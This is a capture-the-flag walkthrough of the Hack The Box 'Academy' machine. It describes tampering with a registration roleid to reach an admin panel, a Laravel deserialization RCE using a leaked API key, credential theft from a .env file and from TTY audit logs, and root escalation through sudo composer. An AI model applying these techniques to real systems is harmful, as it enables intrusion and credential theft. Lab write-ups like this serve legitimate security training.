Academy
Last updated
Was this helpful?
Last updated
Was this helpful?
Synopsis Academy is an easy difficulty Linux machine that features an Apache server hosting a PHP website. The website is found to be the HTB Academy learning platform. Capturing the user registration request in Burp reveals that we are able to modify the Role ID, which allows us to access an admin portal. This reveals a vhost, that is found to be running on Laravel. Laravel debug mode is enabled, the exposed API Key and vulnerable version of Laravel allow us carry out a deserialization attack that results in Remote Code Execution. Examination of the Laravel .env file for another application reveals a password that is found to work for the cry0l1t3 user, who is a member of the adm group. This allows us to read system logs, and the TTY input audit logs reveals the password for the mrb3n user. mrb3n has been granted permission to execute composer as root using sudo , which we can leverage in order to escalate our privileges
As usual starting by scanning open ports and running services using nmap
add academy.htb to the /etc/hosts file echo "10.10.10.215 academy.htb" >> /etc/hosts and then open the website in the browser
first let's register an account
when performing a simple register we are redirected to the login page and after login to the home page where you can purchase modules but if we go to the directory /admin.php we will find a login page but if we enter the credentials of the account we have registered it will not accept it and this is because the application is using some role authorization mechanism
when registring enter username and password and before submitting intercept request using burp so we can notice that there is HTTP Post parameter called roleid which is set by default to 0
let's try to set it to another value to get another role in the application
let's set it to 1 and send the request
after we registered an account with different role id let's go the login page at /admin.php and login with the manipulated account
and boom we are admin now
in this table there is virtual host dev-staging-01.academy.htb
let's add it to the file /etc/hosts
if we visit this virtual host on the browser we will find that this page is using laravel framework and it has debug mode and there leaked environement variables like the API_KEY
searching for any laravel exploits using searchsploit we find a couple ones looking for each one of them in exploitDB we find that the token unserialize RCE exploit needs a valid API_key to work which we have and also requires the debug mode to be enabled
to exploit this vulnerability in laravel we can use a github exploit
you will find the installation guide in this repository
URL : http://dev-staging-01.academy.htb
API_KEY : dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
enumerating the box we can find a hidden environement variable file in the website files located at /var/www/html/academy/.env which contains cry0l1t3 password
now let's use this password to login as cry0l1t3 (after testing this password against all /etc/passwd users that have /bin/bash we found that this password is cry0l1t3's password)
let's which groups this user belong to
let's find all files and directories owned by the group "adm"
so the adm group owns a lot of log files that means that all members of this group have the right to read the logs, let's read those logs and see if anything interesting appears
after reading the logs manually i couldn't find anything of interest so i used a tool called aureport which is a tool that produces a summary report of system logs
--tty : Report about tty keystrokes which may include plaintext passwords
now let's ssh as the user mrb3n
performing manual enumration on the box we find that the user mrb3n can run the composer command using sudo
according to gtfobins we can abuse the command composer to get a privilege escalation on the machine
hope you found this walkthrough easy to understand and follow
Greeting From Sayonara
